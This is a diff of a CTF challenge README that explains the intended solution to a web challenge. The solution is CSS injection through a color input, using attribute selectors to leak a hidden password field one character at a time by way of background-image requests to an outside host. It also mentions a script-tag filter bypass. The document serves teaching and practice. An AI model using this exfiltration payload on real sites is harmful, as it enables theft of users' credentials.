csivitu/ctf-challenges/web/The Confused Deputy/README.md

 ## Exploit

-This is a CSS injection challenge.
+This is a CSS injection challenge (of course you can do `<<script >>` but the intended solution is CSS injection).
 In the page you open, you can see that there is an input box where you can enter a color, which gets applied as you click on submit.
 There's also a hidden field `password`, the value of which is taken from the cookie.
 Since the string is interpolated, you can do something like `blue}; input[type="password"][value^="c"] {background-image: url('https://example.com?c');`, which will send a request to `example.com?c`, if the first character of the password is `c`.
 <br />

 You may pass a long list of such CSS selectors, for all letters, for example.
 For example: